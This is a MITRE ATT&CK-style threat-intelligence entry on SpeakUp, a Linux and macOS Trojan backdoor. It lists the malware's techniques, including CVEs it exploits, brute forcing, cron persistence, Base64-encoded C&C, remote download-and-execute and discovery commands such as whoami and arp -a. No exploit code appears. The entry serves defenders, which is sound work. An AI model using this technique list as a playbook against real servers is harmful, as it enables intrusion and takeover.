SpeakUp is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. [1]

ID: S0374
Platforms: Linux, macOS
Version: 1.0

Techniques Used

Domain ID Name Use
Enterprise T1110 Brute Force SpeakUp can perform brute forcing using a pre-defined list of usernames and passwords in an attempt to log in to administrative panels.[1]
Enterprise T1132 Data Encoding SpeakUp encodes C&C communication using Base64.[1]
Enterprise T1203 Exploitation for Client Execution SpeakUp attempts to exploit the following vulnerabilities in order to execute its malicious script: CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, JBoss AS 3/4/5/6, and the Hadoop YARN ResourceManager.[1]
Enterprise T1107 File Deletion SpeakUp deletes files to remove evidence on the machine.[1]
Enterprise T1168 Local Job Scheduling SpeakUp uses cron tasks to ensure persistence.[1]
Enterprise T1046 Network Service Scanning SpeakUp checks for availability of specific ports on servers.[1]
Enterprise T1027 Obfuscated Files or Information SpeakUp encodes its second-stage payload with Base64.[1]
Enterprise T1105 Remote File Copy SpeakUp downloads and executes additional files from a remote server.[1]
Enterprise T1064 Scripting SpeakUp uses Perl and Python scripts.[1]
Enterprise T1071 Standard Application Layer Protocol SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C server.[1]
Enterprise T1082 System Information Discovery SpeakUp uses the cat /proc/cpuinfo | grep -c “cpu family” 2>&1 command to gather system information.[1]
Enterprise T1016 System Network Configuration Discovery SpeakUp uses the ifconfig -a command.[1]
Enterprise T1049 System Network Connections Discovery SpeakUp uses the arp -a command.[1]
Enterprise T1033 System Owner/User Discovery SpeakUp uses the whoami command.[1]